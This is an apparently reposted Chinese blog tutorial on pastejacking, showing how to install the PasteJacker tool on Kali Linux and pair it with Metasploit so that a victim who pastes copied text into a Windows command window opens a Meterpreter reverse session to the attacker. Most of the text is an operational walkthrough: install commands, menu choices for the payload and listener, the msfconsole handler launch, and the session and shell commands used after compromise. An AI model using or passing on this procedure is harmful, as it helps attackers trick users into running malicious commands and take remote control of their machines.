kali linux 通过粘贴板攻击对方服务器
目錄
一、粘貼板中毒攻擊原理
二、Pastejacker 攻擊工具簡介
三、安裝Pastejacker
四、Pastejacker結合MSF拿到目標shell權限
一、粘貼板中毒攻擊原理
該工具的主要目的是自動化攻擊,將此攻擊中使用的所有已知技巧收集在一個地方和一項自動化工作,因為在搜索后發現沒有工具可以正確地完成這項工作方式現在因為這種攻擊取決于用戶將粘貼什么,將 Metasploit 網絡交付模塊的想法實現到工具中,所以當用戶粘貼到終端時,你會在他的設備上獲得 meterpreter 會話。
換句話說,當我們在自己電腦上的一個網站上復制一條看似正常的命令時,但事實上那個網站在背后偷偷的篡改了我們粘貼的內容,我以為我復制了一條正常的命令,但事實上我復制到粘貼板上的命令,卻是一串惡意代碼,這就是惡意的網站搭建者,他欺騙我們最終用戶訪問他的惡意網站,然后通過我們在他網站上的鍵盤和鼠標操作,將惡意的內容注入到我們本地的剪貼板當中,這種攻擊方式,我們就成為粘貼劫持攻擊。
二、Pastejacker 攻擊工具簡介
模擬剪貼板劫持對目標進行攻擊。
https://github.com/D4Vinci/PasteJacker
簡而言之,粘貼劫持是惡意網站用來控制您計算機的剪貼板并在您不知情的情況下將其內容更改為有害內容的一種方法。
所以在這里所做的是自動化原始攻擊并添加另外兩個技巧來欺騙用戶,使用 HTML 和 CSS將討論它然后添加 meterpreter 會話
三、安裝Pastejacker
安裝 Pastejacker 工具
git clone https://github.com/D4Vinci/PasteJacker.git注意Kali Linux 默認安裝了 Python 2.x 和 Python 3.x 版本,可以按照以下步驟在 Kali 中切換到 Python 3:
sudo update-alternatives --install /usr/bin/python python /usr/bin/python2*
sudo update-alternatives --install /usr/bin/python python /usr/bin/python3*
這將把 /usr/bin/python 鏈接到 Python 2.7 和 Python 3 之間進行切換。您可以使用以下命令來切換到 Python 3:
sudo update-alternatives --config python
?
安裝pip
wget https://bootstrap.pypa.io/get-pip.py python3 get-pip.py安裝PasteJacker
python3 -m pip install ./PasteJacker四、Pastejacker結合MSF拿到目標shell權限
進入Pastejacker安裝路徑:
cd /usr/local/lib/python3.9/dist-packages/PasteJacker/Core?
vim updater.py?
按i進入編輯模式把選中的內容按D刪除。按ESC-- :wq保存退出
運行工具 :pastejacker
?
選擇:1(Windows)
選擇:1
選擇:1-- TCP協議的后滲透模塊
然后輸入本地IP
?端口自己設定或者默認回車就可以了?
?選擇:2;服務端口默認80回車
輸入一些文字內容訪問攻擊者IP時候會出現瀏覽器頁面上
?這時候服務已開啟……
新建一個終端進入pastejacker文件夾
cd .pastejacker/?利用MSF啟動pastejacker 設置好的文件包(msf_handler.rc),該文件是在 pastejacker 程序設置而保存下來的操作,直接使用該文件即可,不需要去手動設置
msfconsole -r msf_handler.rc?到Windows受害者端訪問kali攻擊者的IP地址
復制內容粘貼到cmd命令窗口
?查看目標列表
sessions選中列表中的第一個,如果有多個粘貼運行了剪貼板可在列表中選其中一個進行后滲透?
sessions -i 1?
shell //獲取shell chcp 65001 //解決亂碼?
總結
以上是生活随笔為你收集整理的kali linux 通过粘贴板攻击对方服务器的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: office钓鱼学习
- 下一篇: 《秘密全在小动作上》读书笔记